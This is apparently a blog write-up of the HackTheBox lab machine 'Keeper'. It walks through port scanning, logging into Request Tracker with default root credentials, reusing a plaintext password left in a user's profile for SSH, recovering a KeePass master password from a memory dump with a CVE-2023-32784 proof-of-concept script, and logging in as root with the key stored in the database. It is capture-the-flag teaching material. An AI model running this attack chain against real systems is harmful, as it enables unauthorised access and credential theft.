← cd ../blog

Keeper

os: Linux
difficulty: Easy
date: 2026-03-15
platform: HackTheBox
request-tracker default-creds keepass CVE-2023-32784

// reconnaissance

Starting with a standard nmap scan to identify open ports and running services on the target.

$ nmap -sC -sV -oN nmap/initial 10.10.11.227 Starting Nmap 7.94 ( https://nmap.org ) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.3 80/tcp open http nginx 1.18.0 (Ubuntu) |_http-title: Login

Only two ports open. Port 80 redirects to tickets.keeper.htb. Adding the hostname to /etc/hosts and navigating to the site reveals a Request Tracker (RT) login page.

// enumeration

Request Tracker is a well-known ticketing system. Checking for default credentials before going deeper.

# Default RT credentials Username: root Password: password [+] Login successful — full admin access to RT instance

Default credentials work. Inside the admin panel, we find a user account for lnorgaard (Lise Norgaard). Her user profile contains a note with her initial password stored in plaintext — a common lazy admin move.

# From user profile notes New user. Initial password set to Welcome2023!

// initial foothold

Using the discovered credentials to SSH in as lnorgaard.

$ ssh lnorgaard@10.10.11.227 lnorgaard@10.10.11.227's password: Welcome2023! lnorgaard@keeper:~$

We're in. The user flag is right in the home directory.

// privilege escalation

In lnorgaard's home directory, there's a zip file containing a KeePass database dump and a crash dump file.

lnorgaard@keeper:~$ ls -la -rw-r--r-- 1 root root 87391651 RT30000.zip -rw-r----- 1 lnorgaard lnorgaard 33 user.txt lnorgaard@keeper:~$ unzip RT30000.zip inflating: KeePassDumpFull.dmp inflating: passcodes.kdbx

KeePass version 2.x is vulnerable to CVE-2023-32784 — a memory dump attack that can recover the master password from a process dump. Using the PoC tool to extract it.

$ python3 keepass-dump-masterkey/poc.py -d KeePassDumpFull.dmp Possible password: ●ldgr●d med fl●de # Googling the partial match reveals a Danish recipe rødgrød med fløde

Opening the KeePass database with the recovered password reveals a PuTTY PPK key stored in the root entry's notes field. Converting it to OpenSSH format and using it to authenticate as root.

$ puttygen key.ppk -O private-openssh -o root_key $ chmod 600 root_key $ ssh -i root_key root@10.10.11.227 root@keeper:~#

// flags

user.txt
b09xxxxxxxxxxxxxxxxxxxxxxxx3f91
root.txt
d44xxxxxxxxxxxxx8a10

// lessons learned

← cd ../blog